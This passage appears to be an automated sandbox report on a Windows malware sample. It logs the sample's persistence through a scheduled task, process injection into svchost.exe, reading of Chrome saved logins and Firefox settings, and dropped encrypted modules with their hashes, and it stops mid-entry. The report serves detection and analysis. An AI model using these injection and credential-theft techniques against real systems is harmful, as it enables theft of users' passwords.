Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A048Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A04CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A050Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A054Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A058Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A05CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A060Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A064Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A068Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A06CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A070Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A074Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A078Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A07CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A080Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A084Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A088Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A08CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A090Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A094Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A098Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A09CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0ACJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0BCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0CCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0DCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0ECJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0FCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A100Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A108Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A10CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A110Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A114Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A118Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A11CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A120Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A124Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A128Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A12CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A130Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A134Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe, Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: C:\Windows\System32\taskeng.exe, Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Process created: C:\Windows\System32\svchost.exe svchost.exe
Contains functionality to create a new security descriptor
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Code function: 2_2_003C80A0 AllocateAndInitializeSid,AllocateAndInitializeSid,memset,SetEntriesInAclW,SetSecurityInfo,SetSecurityInfo,GetCurrentProcess,SetSecurityInfo,SetSecurityInfo,SetSecurityInfo,SetSecurityInfo,GetLastError,FreeSid,FreeSid,LocalFree,CloseHandle

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Code function: 2_2_003C7131 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Code function: 2_2_003C1440 GetUserNameW,memset
Contains functionality to query windows version
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe, Code function: 2_2_003CEB30 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary
Queries the cryptographic machine GUID
Source: C:\Windows\System32\taskeng.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\System32\svchost.exe, File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Source: C:\Windows\System32\svchost.exe, File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Source: C:\Windows\System32\svchost.exe, File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\svchost.exe, File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Source: C:\Windows\System32\svchost.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Source: C:\Windows\System32\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Source: C:\Windows\System32\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Behavior Graph

[Behavior graph (image not preserved): ID 575186, sample ucD6u0vstJ.exe, start date 05/06/2018, architecture WINDOWS, score 100. Process chain shown: ucD6u0vstJ.exe and taskeng.exe each start ucE7u0vttK.exe; the instance started by taskeng.exe starts two svchost.exe processes.]

Simulations

Behavior and APIs

Time | Type | Description
11:05:28 | API Interceptor | 1x Sleep call for process: ucD6u0vstJ.exe modified
11:05:43 | Task Scheduler | Run new task: MsSysToken path: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
11:05:43 | API Interceptor | 4x Sleep call for process: ucE7u0vttK.exe modified
11:06:03 | API Interceptor | 4x Sleep call for process: taskeng.exe modified
11:07:02 | API Interceptor | 83x Sleep call for process: svchost.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7_1
  • ucD6u0vstJ.exe (PID: 3480 cmdline: 'C:\Users\user\Desktop\ucD6u0vstJ.exe' MD5: DE1CE3514F777178D672EE79AC398A74)
    • ucE7u0vttK.exe (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe MD5: DE1CE3514F777178D672EE79AC398A74)
  • taskeng.exe (PID: 3536 cmdline: taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407)
    • ucE7u0vttK.exe (PID: 3568 cmdline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe MD5: DE1CE3514F777178D672EE79AC398A74)
      • svchost.exe (PID: 3728 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
      • svchost.exe (PID: 3916 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Process:C:\Windows\System32\svchost.exe
File Type:SQLite 3.x database
Size (bytes):94208
Entropy (8bit):0.4994935498288338
Encrypted:false
MD5:AE387499C77AE5E429D7BF8175421FB1
SHA1:F02567C0BFDC2B9D29C666FE690464AB329D460E
SHA-256:9B6B172C1162D1B0C2640D763F9642E3125094BD4864917C8B99693A2B8B19B3
SHA-512:5DB630B31F11A10EF36B81B123A102833DF0AF89248D9110DFC13366A0DE0915F43B5765A2869CE50B6E28223967F52E20ED19766E43842200A7668E632C1B76
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Process:C:\Windows\System32\svchost.exe
File Type:SQLite 3.x database
Size (bytes):18432
Entropy (8bit):0.852140055112637
Encrypted:false
MD5:A8621F29FD303FB5ED20DAAD3FD3A8CB
SHA1:F536DE7809F38BC0FCD33A9FCA7A8CF4ECE6DDAC
SHA-256:3A646CB91D47FD9345EED024714DE3AA07AFD2FA1F558D408A1A45A6D76CB572
SHA-512:BA663CD2FAF7AC63536772BC2E6674779C285B297D8B70F783C80BCA658F405A306F5E3C3DDB9225928C1636F5CDB5D3585F7885D509F7B52CCFD75508F32C3F
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):160
Entropy (8bit):4.435439401639462
Encrypted:false
MD5:2FCDBA665D4FF7FFC6C99CCDB7568D11
SHA1:2AEAAFBB94BB218536B7FDD1F042BDD1D225AF75
SHA-256:F45D0AE1321B66DA296006DC119A5EEF80B796C8E523F51A1A62A0F7FF4B22B6
SHA-512:A83F98863E26C7BA4EA28108621D799E535B66E8E499C557AFFF05EE0B8F354416C80662C40AEE8B8A5925C94AAD7AC1ADCB112B7419A599B457B71E1467750B
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\FAQ
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):96
Entropy (8bit):2.933434330649638
Encrypted:false
MD5:8BB138CF0BD64AEC67410CAFDAFE11EE
SHA1:DE16894822BDD3A0F0A022BE3670EF24157B853C
SHA-256:D2E926923CA8A6B1930841AD9E398DD3F64ACA47E2A32771326953C97A910C6C
SHA-512:6F4E9F627DD25E7DC65C779752742EB0736FEFCC156E1B291984ACE1F75A9FA07E209AEB4C814AE77C2F8AFA24957CB96B15D826171EDF078E5E6550B4FCCB1C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):754640
Entropy (8bit):7.999762607389893
Encrypted:true
MD5:E641A3AC1612AA80FAC5DE6C27ABAF46
SHA1:E1727531476288B902198FD88B0FAD0DD0A075A1
SHA-256:6AE2884548A4A9AEA6B755E4F3D9249D8516B1B92240ECCE4DC266BFBCBDFD3B
SHA-512:9A30A9AC5E02EEBA148943FB7EA842250691B6EE1FBBE8B4C4B2DD567F91B1CF802C32BFF24C04DD265C46D7C4783CBE061EE3EE0279C24C23FAF4521ADDE239
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\dinj
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):51344
Entropy (8bit):7.996502571345262
Encrypted:true
MD5:A4DCDCD1E52439DEB0F9F90C6F03187C
SHA1:1F9DA771CEB462DAB2554ECAA3ED3B36D9AB1C84
SHA-256:5540D7C9D32870FD6E86F8E224751E39EA4F9AB62DFB074023F4E49E4C670190
SHA-512:1D8F731BD0691DBB8B61A24F055B9E0B15CDC30DF3278ED9667F2E475F7271B65EBFC413FF10E8A52AEBE1D0DAC030941824ED11311B4B9137B03DD68EB223B3
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\dpost
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):432
Entropy (8bit):7.5509106377198245
Encrypted:false
MD5:8A181B24533AE20F79CF3EEC69F5E825
SHA1:10C93A045015E86713385609E8B837F6CBD18973
SHA-256:AA20066550E0F5AA737CBF811EFA315AEF63525B35C87F54CE1A708D4B09CA13
SHA-512:A5A59AB3EC9CFD15A4332F3233CCDC928BBA1DFD94508EA9259FBD304B736AF7FA67B8A7450435A56D7DB440C672CF65FE2D14900042186DD215155167B29EE8
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\sinj
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):38304
Entropy (8bit):7.995009190804732
Encrypted:true
MD5:2B8140202BA9A927CE8D6087E54A17B4
SHA1:E63003740A5CF1009ECA497E1F437E2B4FEAD776
SHA-256:8CA53E9DA08EB1F233BA7D115D3683C808815DDDAFBD1207399AE6525A3A216E
SHA-512:B8E24196E295E5594666E28B38759B7572A2C9B1EB96FD33937DBF9084F9B8D12CABC46992AE98649B26E05E34817A329E93C97C4B4B48B65386240F544F138F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):87216
Entropy (8bit):7.99816202635642
Encrypted:true
MD5:B3A9D059584418A2A0803FB0C6753EA9
SHA1:D19EF63CCEF78C785CBDE5008FBFE7721625D02F
SHA-256:70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
SHA-512:51C13E5D6C91341A158A40D746E929433B78F39BE48B3705D3E0B172CDCFDE677B008F58FC938C06AE93D8157008D28ED3C662811A720DC42E203FAB34A9D2DC
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\README.md
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):14
Entropy (8bit):2.09306920777189
Encrypted:false
MD5:1675B57D7147ACDB9532C46A7F483237
SHA1:AC59890339D2C9B99E2A50EC5DCF52603C1096C2
SHA-256:0564493BCBA2C6F7A80D5E86BB4202B61CAB5B0CB7E9E8E57F72FC98DEB1CFB5
SHA-512:C49E69662FC5B211104A2FE57EEA3375520F9E92D2DF77C43B477EAE7FBF229775151642A604F99A69B413757B011223A738E1CE66BFDD05FD92BFF5C3E5D05B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\info.dat
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:PCX ver. 2.8 image data, without palette
Size (bytes):1272
Entropy (8bit):7.8393510891099645
Encrypted:false
MD5:8CD554954C5486C34AC28E58D2B0AFAC
SHA1:53F3E131EB4AECA1608B24AF62A7E84B84B6614C
SHA-256:2FDE9C9EADFF705F6B7C2E69315EDA634C69458EE64C994C7A0788CF3957D699
